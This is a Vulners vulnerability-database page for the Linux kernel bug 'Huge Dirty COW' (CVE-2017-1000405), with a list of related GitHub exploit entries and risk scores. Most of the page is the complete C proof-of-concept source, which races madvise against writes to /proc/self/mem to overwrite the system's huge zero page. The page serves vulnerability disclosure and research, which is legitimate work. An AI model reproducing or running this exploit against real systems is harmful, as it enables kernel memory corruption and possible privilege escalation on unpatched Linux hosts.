Vulners
Lucene search
"Huge Dirty COW" (CVE-2017–1000405)
| Reporter | Title | Published | Views | Family All 604 |
|---|---|---|---|---|
 | linux-privesc-linpeas | 12 Jun 202603:52 | – | githubexploit |
| Exploit for Incorrect Resource Transfer Between Spheres in Linux Linux_Kernel | 5 May 202611:26 | – | githubexploit |
| Exploit for Improper Initialization in Linux Linux_Kernel | 4 Jun 202413:25 | – | githubexploit |
| Exploit for Race Condition in Canonical Ubuntu_Linux | 17 Nov 201602:20 | – | githubexploit |
| Exploit for Race Condition in Canonical Ubuntu_Linux | 16 Mar 202609:19 | – | githubexploit |
| Dirty-cow-exploit | 5 Jun 202618:34 | – | githubexploit |
| multi-layered-security-assessment | 2 Jun 202608:36 | – | githubexploit |
| Exploit for Improper Initialization in Linux Linux_Kernel | 7 Mar 202218:36 | – | githubexploit |
| Exploit for Improper Initialization in Linux Linux_Kernel | 9 Mar 202202:47 | – | githubexploit |
| Exploit for Race Condition in Canonical Ubuntu_Linux | 13 Mar 202611:23 | – | githubexploit |
10
//
// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.
// Compile with "gcc -pthread main.c"
//
// November 2017
// Bindecy
//
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sched.h>
#include <string.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#define MAP_BASE ((void *)0x4000000)
#define MAP_SIZE (0x200000)
#define MEMESET_VAL (0x41)
#define PAGE_SIZE (0x1000)
#define TRIES_PER_PAGE (20000000)
struct thread_args {
char *thp_map;
char *thp_chk_map;
off_t off;
char *buf_to_write;
int stop;
int mem_fd1;
int mem_fd2;
};
typedef void * (*pthread_proc)(void *);
void *unmap_and_read_thread(struct thread_args *args) {
char c;
int i;
for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {
madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.
memcpy(&c, args->thp_map + args->off, sizeof(c));
read(args->mem_fd2, &c, sizeof(c));
lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);
usleep(10); // We placed the zero page and marked its PMD as dirty.
// Give get_user_pages() another chance before madvise()-ing again.
}
return NULL;
}
void *write_thread(struct thread_args *args) {
int i;
for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {
lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);
madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.
write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);
}
return NULL;
}
void *wait_for_success(struct thread_args *args) {
while (args->thp_chk_map[args->off] != MEMESET_VAL) {
madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);
sched_yield();
}
args->stop = 1;
return NULL;
}
int main() {
struct thread_args args;
void *thp_chk_map_addr;
int ret;
// Mapping base should be a multiple of the THP size, so we can work with the whole huge page.
args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (args.thp_map == MAP_FAILED) {
perror("[!] mmap()");
return -1;
}
if (args.thp_map != MAP_BASE) {
fprintf(stderr, "[!] Didn't get desired base address for the vulnerable mapping.\n");
goto err_unmap1;
}
printf("[*] The beginning of the zero huge page: %lx\n", *(unsigned long *)args.thp_map);
thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge
args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (args.thp_chk_map == MAP_FAILED) {
perror("[!] mmap()");
goto err_unmap1;
}
if (args.thp_chk_map != thp_chk_map_addr) {
fprintf(stderr, "[!] Didn't get desired base address for the check mapping.\n");
goto err_unmap2;
}
ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE);
ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);
if (ret) {
perror("[!] madvise()");
goto err_unmap2;
}
args.buf_to_write = malloc(PAGE_SIZE);
if (!args.buf_to_write) {
perror("[!] malloc()");
goto err_unmap2;
}
memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);
args.mem_fd1 = open("/proc/self/mem", O_RDWR);
if (args.mem_fd1 < 0) {
perror("[!] open()");
goto err_free;
}
args.mem_fd2 = open("/proc/self/mem", O_RDWR);
if (args.mem_fd2 < 0) {
perror("[!] open()");
goto err_close1;
}
printf("[*] Racing. Gonna take a while...\n");
args.off = 0;
// Overwrite every single page
while (args.off < MAP_SIZE) {
pthread_t threads[3];
args.stop = 0;
ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);
ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);
ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);
if (ret) {
perror("[!] pthread_create()");
goto err_close2;
}
pthread_join(threads[0], NULL); // This call will return only after the overwriting is done
pthread_join(threads[1], NULL);
pthread_join(threads[2], NULL);
args.off += PAGE_SIZE;
printf("[*] Done 0x%lx bytes\n", args.off);
}
printf("[*] Success!\n");
err_close2:
close(args.mem_fd2);
err_close1:
close(args.mem_fd1);
err_free:
free(args.buf_to_write);
err_unmap2:
munmap(args.thp_chk_map, MAP_SIZE);
err_unmap1:
munmap(args.thp_map, MAP_SIZE);
if (ret) {
fprintf(stderr, "[!] Exploit failed.\n");
}
return ret;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Nov 2017 00:00Current
7.9High risk
Vulners AI Score7.9
EPSS0.93929